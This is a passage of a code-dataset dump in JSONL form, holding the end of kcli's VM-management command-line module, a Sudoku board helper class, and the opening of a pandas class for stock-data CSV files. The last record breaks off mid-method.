common.pprint(\"Updating repo %s...\" % repo)\n baseconfig.update_repo(repo)\n else:\n common.pprint(\"Updating repo %s...\" % repo)\n baseconfig.update_repo(repo)\n return\n if repo is None:\n common.pprint(\"Missing repo. Leaving...\", color='red')\n os._exit(1)\n if delete:\n common.pprint(\"Deleting repo %s...\" % repo)\n baseconfig.delete_repo(repo)\n return\n if update:\n common.pprint(\"Updating repo %s...\" % repo)\n baseconfig.delete_repo(repo)\n return\n if url is None:\n common.pprint(\"Missing url. 
Leaving...\", color='red')\n os._exit(1)\n common.pprint(\"Adding repo %s...\" % repo)\n baseconfig.create_repo(repo, url)\n return 0\n\n\ndef product(args):\n \"\"\"Create product\"\"\"\n repo = args.repo\n product = args.product\n latest = args.latest\n group = args.group\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n plan = overrides['plan'] if 'plan' in overrides else None\n info = args.info\n search = args.search\n if info:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n common.pprint(\"Providing information on product %s...\" % product)\n baseconfig.info_product(product, repo, group)\n elif search:\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n products = PrettyTable([\"Repo\", \"Group\", \"Product\", \"Description\", \"Numvms\", \"Memory\"])\n products.align[\"Repo\"] = \"l\"\n productsinfo = baseconfig.list_products(repo=repo)\n for prod in sorted(productsinfo, key=lambda x: (x['repo'], x['group'], x['name'])):\n name = prod['name']\n repo = prod['repo']\n prodgroup = prod['group']\n description = prod.get('description', 'N/A')\n if product.lower() not in name.lower() and product.lower() not in description.lower():\n continue\n if group is not None and prodgroup != group:\n continue\n numvms = prod.get('numvms', 'N/A')\n memory = prod.get('memory', 'N/A')\n group = prod.get('group', 'N/A')\n products.add_row([repo, group, name, description, numvms, memory])\n print(products)\n else:\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone,\n namespace=args.namespace)\n common.pprint(\"Creating product %s...\" % product)\n config.create_product(product, repo=repo, group=group, plan=plan, latest=latest, overrides=overrides)\n return 0\n\n\ndef ssh(args):\n \"\"\"Ssh into vm\"\"\"\n l = args.L\n r = args.R\n D = args.D\n X = args.X\n Y = args.Y\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n name = [common.get_lastvm(config.client)] if not args.name else args.name\n k = config.k\n tunnel = config.tunnel\n insecure = config.insecure\n if len(name) > 1:\n cmd = ' '.join(name[1:])\n else:\n cmd = None\n name = name[0]\n if '@' in name and len(name.split('@')) == 2:\n user = name.split('@')[0]\n name = name.split('@')[1]\n else:\n user = None\n if os.path.exists(\"/i_am_a_container\") and not os.path.exists(\"/root/.kcli/config.yml\")\\\n and not os.path.exists(\"/root/.ssh/config\"):\n insecure = True\n sshcommand = k.ssh(name, user=user, local=l, remote=r, tunnel=tunnel, insecure=insecure, cmd=cmd, X=X, Y=Y, D=D)\n if sshcommand is not None:\n if find_executable('ssh') is not None:\n os.system(sshcommand)\n else:\n print(sshcommand)\n else:\n common.pprint(\"Couldnt ssh to %s\" % name, color='red')\n\n\ndef scp(args):\n \"\"\"Scp into vm\"\"\"\n recursive = args.recursive\n volumepath = args.volumepath\n source = args.source[0]\n source = source if not os.path.exists(\"/i_am_a_container\") else \"%s/%s\" % (volumepath, source)\n destination = args.destination[0]\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n tunnel = config.tunnel\n if len(source.split(':')) == 2:\n name, source = source.split(':')\n download = True\n elif len(destination.split(':')) == 2:\n name, destination = destination.split(':')\n download = False\n else:\n common.pprint(\"Couldn't run scp\", color='red')\n return\n if '@' in name and 
len(name.split('@')) == 2:\n user, name = name.split('@')\n else:\n user = None\n scpcommand = k.scp(name, user=user, source=source, destination=destination,\n tunnel=tunnel, download=download, recursive=recursive)\n if scpcommand is not None:\n if find_executable('scp') is not None:\n os.system(scpcommand)\n else:\n print(scpcommand)\n else:\n common.pprint(\"Couldn't run scp\", color='red')\n\n\ndef network(args):\n \"\"\"Create/Delete/List Network\"\"\"\n name = args.name\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n delete = args.delete\n isolated = args.isolated\n cidr = args.cidr\n nodhcp = args.nodhcp\n domain = args.domain\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if name is None:\n common.pprint(\"Missing Network\", color='red')\n os._exit(1)\n if delete:\n result = k.delete_network(name=name, cidr=cidr)\n common.handle_response(result, name, element='Network ', action='deleted')\n else:\n if isolated:\n nat = False\n else:\n nat = True\n dhcp = not nodhcp\n result = k.create_network(name=name, cidr=cidr, dhcp=dhcp, nat=nat, domain=domain, overrides=overrides)\n common.handle_response(result, name, element='Network ')\n\n\ndef bootstrap(args):\n \"\"\"Generate basic config file\"\"\"\n name = args.name\n host = args.host\n port = args.port\n user = args.user\n protocol = args.protocol\n url = args.url\n pool = args.pool\n poolpath = args.poolpath\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n baseconfig.bootstrap(name, host, port, user, protocol, url, pool, poolpath)\n\n\ndef container(args):\n \"\"\"Create container\"\"\"\n name = args.name\n profile = args.profile\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n if name is None:\n name = nameutils.get_random_name()\n if config.type == 'kubevirt':\n name = name.replace('_', '-')\n if profile is None:\n common.pprint(\"Missing profile\", color='red')\n os._exit(1)\n containerprofiles = {k: v for k, v in config.profiles.items() if 'type' in v and v['type'] == 'container'}\n if profile not in containerprofiles:\n common.pprint(\"profile %s not found. Trying to use the profile as image\"\n \"and default values...\" % profile, color='blue')\n cont.create_container(name, profile, overrides=overrides)\n else:\n common.pprint(\"Deploying container %s from profile %s...\" % (name, profile))\n profile = containerprofiles[profile]\n image = next((e for e in [profile.get('image'), profile.get('template')] if e is not None), None)\n if image is None:\n common.pprint(\"Missing image in profile %s. 
Leaving...\" % profile, color='red')\n os._exit(1)\n cmd = profile.get('cmd', None)\n ports = profile.get('ports', None)\n environment = profile.get('environment', None)\n volumes = next((e for e in [profile.get('volumes'), profile.get('disks')] if e is not None), None)\n cont.create_container(name, image, nets=None, cmd=cmd, ports=ports, volumes=volumes, environment=environment)\n common.pprint(\"container %s created\" % name)\n return\n\n\ndef snapshot(args):\n \"\"\"Create/Delete/Revert snapshot\"\"\"\n snapshot = args.snapshot\n name = args.name\n revert = args.revert\n delete = args.delete\n listing = args.listing\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if revert:\n common.pprint(\"Reverting snapshot of %s named %s...\" % (name, snapshot))\n elif delete:\n common.pprint(\"Deleting snapshot of %s named %s...\" % (name, snapshot))\n elif listing:\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return\n elif snapshot is None:\n common.pprint(\"Missing snapshot name\", color='red')\n return {'result': 'success'}\n else:\n common.pprint(\"Creating snapshot of %s named %s...\" % (name, snapshot))\n result = k.snapshot(snapshot, name, revert=revert, delete=delete)\n code = common.handle_response(result, name, element='', action='snapshotted')\n return code\n\n\ndef report(args):\n \"\"\"Report info about host\"\"\"\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n k.report()\n\n\ndef switch(args):\n \"\"\"Handle host\"\"\"\n host = args.host\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n result = baseconfig.switch_host(host)\n if result['result'] == 'success':\n os._exit(0)\n else:\n os._exit(1)\n\n\ndef cli():\n \"\"\"\n\n \"\"\"\n parser = argparse.ArgumentParser(description='Libvirt/VirtualBox/Kubevirt'\n 'wrapper on steroids. Check out '\n 'https://github.com/karmab/kcli!')\n parser.add_argument('-C', '--client')\n parser.add_argument('--containerclient', help='Containerclient to use')\n parser.add_argument('--dnsclient', help='Dnsclient to use')\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-n', '--namespace', help='Namespace to use. specific to kubevirt')\n parser.add_argument('-r', '--region', help='Region to use. specific to aws/gcp')\n parser.add_argument('-z', '--zone', help='Zone to use. 
specific to gcp')\n parser.add_argument('-v', '--version', action='version', version=__version__)\n\n subparsers = parser.add_subparsers(metavar='')\n\n bootstrap_info = 'Generate basic config file'\n bootstrap_parser = subparsers.add_parser('bootstrap', help=bootstrap_info, description=bootstrap_info)\n bootstrap_parser.add_argument('-n', '--name', help='Name to use', metavar='CLIENT')\n bootstrap_parser.add_argument('-H', '--host', help='Host to use', metavar='HOST')\n bootstrap_parser.add_argument('-p', '--port', help='Port to use', metavar='PORT')\n bootstrap_parser.add_argument('-u', '--user', help='User to use', default='root', metavar='USER')\n bootstrap_parser.add_argument('-P', '--protocol', help='Protocol to use', default='ssh', metavar='PROTOCOL')\n bootstrap_parser.add_argument('-U', '--url', help='URL to use', metavar='URL')\n bootstrap_parser.add_argument('--pool', help='Pool to use', metavar='POOL')\n bootstrap_parser.add_argument('--poolpath', help='Pool Path to use', metavar='POOLPATH')\n bootstrap_parser.set_defaults(func=bootstrap)\n\n clone_info = 'Clone existing vm'\n clone_parser = subparsers.add_parser('clone', description=clone_info, help=clone_info)\n clone_parser.add_argument('-b', '--base', help='Base VM', metavar='BASE')\n clone_parser.add_argument('-f', '--full', action='store_true', help='Full Clone')\n clone_parser.add_argument('-s', '--start', action='store_true', help='Start cloned VM')\n clone_parser.add_argument('name', metavar='VMNAME')\n clone_parser.set_defaults(func=clone)\n\n console_info = 'Vnc/Spice/Serial/Container console'\n console_parser = subparsers.add_parser('console', description=console_info, help=console_info)\n console_parser.add_argument('-s', '--serial', action='store_true')\n console_parser.add_argument('--container', action='store_true')\n console_parser.add_argument('name', metavar='VMNAME', nargs='?')\n console_parser.set_defaults(func=console)\n\n container_info = 'Create container'\n container_parser = subparsers.add_parser('container', description=container_info, help=container_info)\n container_parser.add_argument('-p', '--profile', help='Profile to use', metavar='PROFILE')\n container_parser.add_argument('-P', '--param', action='append',\n help='specify parameter or keyword for rendering (can specify multiple)',\n metavar='PARAM')\n container_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n container_parser.add_argument('name', metavar='NAME', nargs='?')\n container_parser.set_defaults(func=container)\n\n delete_info = 'Delete vm/container'\n delete_parser = subparsers.add_parser('delete', description=delete_info, help=delete_info)\n delete_parser.add_argument('-y', '--yes', action='store_true', help='Dont ask for confirmation')\n delete_parser.add_argument('--container', action='store_true')\n delete_parser.add_argument('-t', '--template', action='store_true', help='delete template')\n delete_parser.add_argument('--snapshots', action='store_true', help='Remove snapshots if needed')\n delete_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n delete_parser.set_defaults(func=delete)\n\n disk_info = 'Add/Delete disk of vm'\n disk_parser = subparsers.add_parser('disk', description=disk_info, help=disk_info)\n disk_parser.add_argument('-d', '--delete', action='store_true')\n disk_parser.add_argument('-s', '--size', type=int, help='Size of the disk to add, in GB', metavar='SIZE')\n disk_parser.add_argument('-n', '--diskname', help='Name or Path of the disk, when deleting', 
metavar='DISKNAME')\n disk_parser.add_argument('-t', '--template', help='Name or Path of a Template, when adding', metavar='TEMPLATE')\n disk_parser.add_argument('-p', '--pool', default='default', help='Pool', metavar='POOL')\n disk_parser.add_argument('name', metavar='VMNAME', nargs='?')\n disk_parser.set_defaults(func=disk)\n\n dns_info = 'Create/Delete dns entries'\n dns_parser = subparsers.add_parser('dns', description=dns_info, help=dns_info)\n dns_parser.add_argument('-d', '--delete', action='store_true')\n dns_parser.add_argument('-n', '--net', help='Domain where to create entry', metavar='NET')\n dns_parser.add_argument('-i', '--ip', help='Ip', metavar='IP')\n dns_parser.add_argument('name', metavar='NAME', nargs='?')\n dns_parser.set_defaults(func=dns)\n\n download_info = 'Download template'\n download_help = \"Template to download. Choose between \\n%s\" % '\\n'.join(TEMPLATES.keys())\n download_parser = subparsers.add_parser('download', description=download_info, help=download_info)\n download_parser.add_argument('-c', '--cmd', help='Extra command to launch after downloading', metavar='CMD')\n download_parser.add_argument('-p', '--pool', help='Pool to use. Defaults to default', metavar='POOL')\n download_parser.add_argument('-u', '--url', help='Url to use', metavar='URL')\n download_parser.add_argument('templates', choices=sorted(TEMPLATES.keys()),\n default='', help=download_help, nargs='*', metavar='')\n download_parser.set_defaults(func=download)\n\n host_info = 'List and Handle host'\n host_parser = subparsers.add_parser('host', description=host_info, help=host_info)\n host_parser.add_argument('-d', '--disable', help='Disable indicated client', metavar='CLIENT')\n host_parser.add_argument('-e', '--enable', help='Enable indicated client', metavar='CLIENT')\n host_parser.add_argument('-s', '--sync', action='store_true',\n help='sync templates between first host and other'\n 'ones of the specified list')\n host_parser.set_defaults(func=host)\n\n info_info = 'Info vms'\n info_parser = subparsers.add_parser('info', description=info_info, help=info_info)\n info_parser.add_argument('-f', '--fields',\n help='Display Corresponding list of fields,'\n 'separated by a comma', metavar='FIELDS')\n info_parser.add_argument('-o', '--output', choices=['plain', 'yaml'], help='Format of the output')\n info_parser.add_argument('-v', '--values', action='store_true', help='Only report values')\n info_parser.add_argument('names', help='VMNAMES', nargs='*')\n info_parser.set_defaults(func=info)\n\n export_info = 'Export vm'\n export_parser = subparsers.add_parser('export', description=export_info, help=export_info)\n export_parser.add_argument('-t', '--template', help='Name for the generated template. Uses the vm name otherwise',\n metavar='TEMPLATE')\n export_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n export_parser.set_defaults(func=export)\n\n lb_info = 'Create/Delete loadbalancer'\n lb_parser = subparsers.add_parser('lb', description=lb_info, help=lb_info)\n lb_parser.add_argument('--checkpath', default='/index.html', help=\"Path to check. Defaults to /index.html\")\n lb_parser.add_argument('--checkport', default=80, help=\"Port to check. Defaults to 80\")\n lb_parser.add_argument('-d', '--delete', action='store_true')\n lb_parser.add_argument('--domain', help='Domain to create a dns entry associated to the load balancer')\n lb_parser.add_argument('-i', '--internal', action='store_true')\n lb_parser.add_argument('-p', '--ports', default='443', help='Load Balancer Ports. 
Defaults to 443')\n lb_parser.add_argument('-v', '--vms', help='Vms to add to the pool')\n lb_parser.add_argument('-y', '--yes', action='store_true', help='Dont ask for confirmation')\n lb_parser.add_argument('name', metavar='NAME', nargs='?')\n lb_parser.set_defaults(func=lb)\n\n list_info = 'List hosts, profiles, flavors, templates, isos,...'\n list_parser = subparsers.add_parser('list', description=list_info, help=list_info)\n list_parser.add_argument('-c', '--clients', action='store_true')\n list_parser.add_argument('-p', '--profiles', action='store_true')\n list_parser.add_argument('-f', '--flavors', action='store_true')\n list_parser.add_argument('-t', '--templates', action='store_true')\n list_parser.add_argument('-i', '--isos', action='store_true')\n list_parser.add_argument('-l', '--loadbalancers', action='store_true')\n list_parser.add_argument('-d', '--disks', action='store_true')\n list_parser.add_argument('-P', '--pools', action='store_true')\n list_parser.add_argument('-n', '--networks', action='store_true')\n list_parser.add_argument('-s', '--subnets', action='store_true')\n list_parser.add_argument('--containers', action='store_true')\n list_parser.add_argument('--images', action='store_true')\n list_parser.add_argument('--short', action='store_true')\n list_parser.add_argument('--plans', action='store_true')\n list_parser.add_argument('--repos', action='store_true')\n list_parser.add_argument('--products', action='store_true')\n list_parser.add_argument('-g', '--group', help='Only Display products of the indicated group', metavar='GROUP')\n list_parser.add_argument('-r', '--repo', help='Only Display products of the indicated repository', metavar='REPO')\n list_parser.add_argument('--filters', choices=('up', 'down'))\n list_parser.set_defaults(func=_list)\n\n network_info = 'Create/Delete Network'\n network_parser = subparsers.add_parser('network', description=network_info, help=network_info)\n network_parser.add_argument('-d', '--delete', action='store_true')\n network_parser.add_argument('-i', '--isolated', action='store_true', help='Isolated Network')\n network_parser.add_argument('-c', '--cidr', help='Cidr of the net', metavar='CIDR')\n network_parser.add_argument('--nodhcp', action='store_true', help='Disable dhcp on the net')\n network_parser.add_argument('--domain', help='DNS domain. 
Defaults to network name')\n network_parser.add_argument('-P', '--param', action='append',\n help='specify parameter or keyword for rendering (can specify multiple)',\n metavar='PARAM')\n network_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n network_parser.add_argument('name', metavar='NETWORK')\n network_parser.set_defaults(func=network)\n\n nic_info = 'Add/Delete nic of vm'\n nic_parser = subparsers.add_parser('nic', description=nic_info, help=nic_info)\n nic_parser.add_argument('-d', '--delete', action='store_true')\n nic_parser.add_argument('-i', '--interface', help='Name of the interface, when deleting', metavar='INTERFACE')\n nic_parser.add_argument('-n', '--network', help='Network', metavar='NETWORK')\n nic_parser.add_argument('name', metavar='VMNAME')\n nic_parser.set_defaults(func=nic)\n\n plan_info = 'Create/Delete/Stop/Start vms from plan file'\n plan_parser = subparsers.add_parser('plan', description=plan_info, help=plan_info)\n plan_parser.add_argument('-A', '--ansible', help='Generate ansible inventory', action='store_true')\n plan_parser.add_argument('-d', '--delete', action='store_true')\n plan_parser.add_argument('-u', '--url', help='Url for plan', metavar='URL')\n plan_parser.add_argument('-i', '--info', action='store_true', help='Provide information on the given plan')\n plan_parser.add_argument('-p', '--path', help='Path where to download plans. Defaults to plan', metavar='PATH')\n plan_parser.add_argument('-a', '--autostart', action='store_true', help='Set all vms from plan to autostart')\n plan_parser.add_argument('-c', '--container', action='store_true', help='Handle container')\n plan_parser.add_argument('-n', '--noautostart', action='store_true', help='Prevent all vms from plan to autostart')\n plan_parser.add_argument('-f', '--inputfile', help='Input Plan file')\n plan_parser.add_argument('--snapshot', action='store_true', help='snapshot all vms from plan')\n plan_parser.add_argument('-r', '--revert', action='store_true', help='revert snapshot of all vms from plan')\n plan_parser.add_argument('--restart', action='store_true', help='restart all vms from plan')\n plan_parser.add_argument('-s', '--start', action='store_true', help='start all vms from plan')\n plan_parser.add_argument('--update', action='store_true', help='update existing vms of the plan')\n plan_parser.add_argument('-w', '--stop', action='store_true', help='stop all vms from plan')\n plan_parser.add_argument('-v', '--volumepath', help='Volume Path (only used with kcli container)',\n default='/workdir', metavar='VOLUMEPATH')\n plan_parser.add_argument('-y', '--yes', action='store_true', help='Dont ask for confirmation')\n plan_parser.add_argument('--delay', default=0, help=\"Delay between each vm's creation\", metavar='DELAY')\n plan_parser.add_argument('-P', '--param', action='append',\n help='Define parameter for rendering (can specify multiple)', metavar='PARAM')\n plan_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n plan_parser.add_argument('plan', metavar='PLAN', nargs='?')\n plan_parser.set_defaults(func=plan)\n\n pool_info = 'Create/Delete pool'\n pool_parser = subparsers.add_parser('pool', description=pool_info, help=pool_info)\n pool_parser.add_argument('-d', '--delete', action='store_true')\n pool_parser.add_argument('-f', '--full', action='store_true')\n pool_parser.add_argument('-t', '--pooltype', help='Type of the pool', choices=('dir', 'lvm', 'zfs'),\n default='dir')\n pool_parser.add_argument('-p', '--path', 
help='Path of the pool', metavar='PATH')\n pool_parser.add_argument('--thinpool', help='Existing thin pool to use with lvm', metavar='THINPOOL')\n pool_parser.add_argument('pool')\n pool_parser.set_defaults(func=pool)\n\n product_info = 'Deploy Product'\n product_parser = subparsers.add_parser('product', description=product_info, help=product_info)\n product_parser.add_argument('-g', '--group', help='Group to use as a name during deployment', metavar='GROUP')\n product_parser.add_argument('-i', '--info', action='store_true', help='Provide information on the given product')\n product_parser.add_argument('-l', '--latest', action='store_true', help='Grab latest version of the plans')\n product_parser.add_argument('-P', '--param', action='append',\n help='Define parameter for rendering within '\n 'scripts. Can be repeated several times',\n metavar='PARAM')\n product_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n product_parser.add_argument('-r', '--repo', help='Repo to use, '\n 'if deploying a product present in several '\n 'repos', metavar='REPO')\n product_parser.add_argument('-s', '--search', action='store_true',\n help='Display matching products')\n product_parser.add_argument('product', metavar='PRODUCT')\n product_parser.set_defaults(func=product)\n\n repo_info = 'Create/Delete repos'\n repo_parser = subparsers.add_parser('repo', description=repo_info, help=repo_info)\n repo_parser.add_argument('-d', '--delete', action='store_true')\n repo_parser.add_argument('-u', '--url', help='URL of the repo', metavar='URL')\n repo_parser.add_argument('-U', '--update', action='store_true', help='Update repo')\n repo_parser.add_argument('repo')\n repo_parser.set_defaults(func=repo)\n\n report_info = 'Report Info about Host'\n report_parser = subparsers.add_parser('report', description=report_info, help=report_info)\n report_parser.set_defaults(func=report)\n\n scp_info = 'Scp into vm'\n scp_parser = subparsers.add_parser('scp', description=scp_info, help=scp_info)\n scp_parser.add_argument('-r', '--recursive', help='Recursive', action='store_true')\n scp_parser.add_argument('-v', '--volumepath', help='Volume Path (only used with kcli container)',\n default='/workdir', metavar='VOLUMEPATH')\n scp_parser.add_argument('source', nargs=1)\n scp_parser.add_argument('destination', nargs=1)\n scp_parser.set_defaults(func=scp)\n\n snapshot_info = 'Create/Delete/Revert snapshot'\n snapshot_parser = subparsers.add_parser('snapshot', description=snapshot_info, help=snapshot_info)\n snapshot_parser.add_argument('-n', '--name', help='Use vm name for creation'\n '/revert/delete', required=True,\n metavar='VMNAME')\n snapshot_parser.add_argument('-r', '--revert', help='Revert to indicated snapshot', action='store_true')\n snapshot_parser.add_argument('-d', '--delete', help='Delete indicated snapshot', action='store_true')\n snapshot_parser.add_argument('-l', '--listing', help='List snapshots', action='store_true')\n snapshot_parser.add_argument('snapshot', nargs='?')\n snapshot_parser.set_defaults(func=snapshot)\n\n ssh_info = 'Ssh into vm'\n ssh_parser = subparsers.add_parser('ssh', description=ssh_info, help=ssh_info)\n ssh_parser.add_argument('-D', help='Dynamic Forwarding', metavar='LOCAL')\n ssh_parser.add_argument('-L', help='Local Forwarding', metavar='LOCAL')\n ssh_parser.add_argument('-R', help='Remote Forwarding', metavar='REMOTE')\n ssh_parser.add_argument('-X', action='store_true', help='Enable X11 Forwarding')\n ssh_parser.add_argument('-Y', action='store_true', 
help='Enable X11 Forwarding(Insecure)')\n ssh_parser.add_argument('name', metavar='VMNAME', nargs='*')\n ssh_parser.set_defaults(func=ssh)\n\n start_info = 'Start vms/containers'\n start_parser = subparsers.add_parser('start', description=start_info, help=start_info)\n start_parser.add_argument('-c', '--container', action='store_true')\n start_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n start_parser.set_defaults(func=start)\n\n stop_info = 'Stop vms/containers'\n stop_parser = subparsers.add_parser('stop', description=stop_info, help=stop_info)\n stop_parser.add_argument('-c', '--container', action='store_true')\n stop_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n stop_parser.set_defaults(func=stop)\n\n restart_info = 'Restart vms/containers'\n restart_parser = subparsers.add_parser('restart', description=restart_info, help=stop_info)\n restart_parser.add_argument('-c', '--container', action='store_true')\n restart_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n restart_parser.set_defaults(func=restart)\n\n switch_info = 'Switch host'\n switch_parser = subparsers.add_parser('switch', description=switch_info, help=switch_info)\n switch_parser.add_argument('host', help='HOST')\n switch_parser.set_defaults(func=switch)\n\n update_info = 'Update ip, memory or numcpus'\n update_parser = subparsers.add_parser('update', description=update_info, help=update_info)\n update_parser.add_argument('-1', '--ip1', help='Ip to set', metavar='IP1')\n update_parser.add_argument('-i', '--information', '--info', help='Information to set', metavar='INFORMATION')\n update_parser.add_argument('--network', '--net', help='Network to update', metavar='NETWORK')\n update_parser.add_argument('-f', '--flavor', help='Flavor to set', metavar='Flavor')\n update_parser.add_argument('-m', '--memory', help='Memory to set', metavar='MEMORY')\n update_parser.add_argument('-c', '--numcpus', type=int, help='Number of cpus to set', metavar='NUMCPUS')\n update_parser.add_argument('-p', '--plan', help='Plan Name to set', metavar='PLAN')\n update_parser.add_argument('-a', '--autostart', action='store_true', help='Set VM to autostart')\n update_parser.add_argument('-n', '--noautostart', action='store_true', help='Prevent VM from autostart')\n update_parser.add_argument('--dns', action='store_true', help='Update Dns entry for the vm')\n update_parser.add_argument('--host', action='store_true', help='Update Host entry for the vm')\n update_parser.add_argument('-d', '--domain', help='Domain', metavar='DOMAIN')\n update_parser.add_argument('-t', '--template', help='Template to set', metavar='TEMPLATE')\n update_parser.add_argument('--iso', help='Iso to set', metavar='ISO')\n update_parser.add_argument('--cloudinit', action='store_true', help='Remove Cloudinit Information from vm')\n update_parser.add_argument('names', help='VMNAMES', nargs='*')\n update_parser.set_defaults(func=update)\n\n vm_info = 'Create vm'\n vm_parser = subparsers.add_parser('vm', description=vm_info, help=vm_info)\n vm_parser.add_argument('-p', '--profile', help='Profile to use', metavar='PROFILE')\n vm_parser.add_argument('--profilefile', help='File to load profiles from', metavar='PROFILEFILE')\n vm_parser.add_argument('-P', '--param', action='append',\n help='specify parameter or keyword for rendering (can specify multiple)', metavar='PARAM')\n vm_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n vm_parser.add_argument('name', metavar='VMNAME', nargs='?')\n 
vm_parser.set_defaults(func=vm)\n if len(sys.argv) == 1 or (len(sys.argv) == 3 and sys.argv[1] == '-C'):\n parser.print_help()\n os._exit(0)\n args = parser.parse_args()\n if args.func.__name__ == 'vm' and args.client is not None and ',' in args.client:\n args.client = random.choice(args.client.split(','))\n common.pprint(\"Selecting %s for creation\" % args.client)\n args.func(args)\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"kvirt/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":63769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"227884879","text":"class Sudoku(object):\n \"\"\"\n A class for basic Sudoku functionality.\n - 'puzzle' should either be a filename for the puzzle to load from the 'puzzles/' folder\n or a list of lists sudoku board with entries as ints and empty tiles represented by 0\n e.g., problem = Sudoku('puz-001.txt')\n or\n board = [[7, 8, 1, 6, 0, 2, 9, 0, 5],\n [9, 0, 2, 7, 1, 0, 0, 0, 0],\n [0, 0, 6, 8, 0, 0, 0, 1, 2],\n [2, 0, 0, 3, 0, 0, 8, 5, 1],\n [0, 7, 3, 5, 0, 0, 0, 0, 4],\n [0, 0, 8, 0, 0, 9, 3, 6, 0],\n [1, 9, 0, 0, 0, 7, 0, 8, 0],\n [8, 6, 7, 0, 0, 3, 4, 0, 9],\n [0, 0, 5, 0, 0, 0, 1, 0, 0]]\n e.g., problem = Sudoku(board)\n \"\"\"\n\n EMPTY = 0\n\n def __init__(self, puzzle):\n \"\"\"\n Constructs the Sudoku class with the given puzzle. See description of Sudoku\n class for which arguments to pass to Sudoku(puzzle).\n self.board is a list of lists representation of the board using ints - you\n can update this board with your new moves\n self.orig_board is a list of lists representation of the original board\n \"\"\"\n if isinstance(puzzle,str):\n self.board = self.load_board(puzzle)\n else:\n self.board = puzzle\n self.orig_board = self.board\n\n def load_board(self, puzzle_file):\n \"\"\"\n Loads a puzzle txt file and converts it to a list of lists integer\n representation with empty tiles as 0.\n \"\"\"\n with open('puzzles/'+puzzle_file, 'r') as f:\n board = []\n for line in f:\n row = [int(s) for s in line.replace('-',str(Sudoku.EMPTY)).split(' ')]\n board += [row]\n return board\n\n def write(self, filename):\n \"\"\"\n Writes the board to file \"filename\".\n \"\"\"\n with open('solved_mrv/'+filename, 'w') as f:\n f.write(self.board_str())\n\n def board_str(self):\n \"\"\"\n Returns a string representation of the board for pretty printing to screen.\n \"\"\"\n out = ''\n for line in self.board:\n str_line = [str(i) if i!=Sudoku.EMPTY else '-' for i in line]\n out += ' '.join(str_line)+'\\n'\n return out[:-1]\n\n def complete(self):\n \"\"\"\n Tests whether all the tiles in the board are filled in.\n Returns true if the board is filled. False, otherwise.\n \"\"\"\n return all([all(row) for row in self.board])\n\n def overwritten(self):\n \"\"\"\n Tests whether one of the original tiles was overwritten. You should NOT\n be overwriting any of the original tiles, so hopefully this returns False.\n Returns True if the board was overwritten. 
False, otherwise.\n \"\"\"\n for row, line in enumerate(self.orig_board):\n for col, num in enumerate(line):\n if num != Sudoku.EMPTY:\n if num != self.board[row][col]:\n return True\n return False\n\n\nif __name__ == '__main__':\n problem = Sudoku('puz-001.txt')\n problem.write('puz-001-solved.txt')\n print(problem.board_str())\n print(problem.complete())\n print(problem.overwritten())\n problem2 = Sudoku(problem.board)\n print(help(Sudoku))\n","sub_path":"HW2Assignment/code/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"458651961","text":"'''\nCreated on May 3, 2019\n\n@author: mac\n'''\nimport pandas as pd\nfrom StockDataItem.StockItemBase import CStockItemBase\nimport os\n\nclass CStockItemIO_CSV(object):\n\n def __init__(self):\n self.stocks = None\n\n def __splictToItems(self, df):\n '''\n 格式统一化,\n '''\n datas = df.to_dict('index')\n keys = datas.keys()\n stocks = []\n for key in keys:\n data = datas[key]\n stock = CStockItemBase()\n stock.initWithDict(data)\n stocks.append(stock)\n self.stocks = stocks\n return stocks\n\n def __formatResultToDataFrame(self, stocks):\n stockList = [t.formatToDict() for t in stocks]\n columns = stocks[0].getColunmInfo()\n d = pd.DataFrame(stockList,columns=columns)\n return d\n\n def __saveToCSV(self,fileName, stocks):\n df = self.__formatResultToDataFrame(stocks)\n df.to_csv(fileName,encoding=\"utf_8_sig\", index=False)\n\n def __saveToExcel(self, fileName, stocks):\n df = self.__formatResultToDataFrame(stocks)\n df.to_excel(fileName,encoding=\"utf_8_sig\", index=False)\n \n def ReadFromCSV(self,fileName):\n df = pd.read_csv(fileName, index_col = None, encoding='utf_8_sig')\n self.__splictToItems(df)\n \n \n def SaveTo(self, fileName):\n return self.SaveToWithStocks(fileName, self.stocks)\n\n def 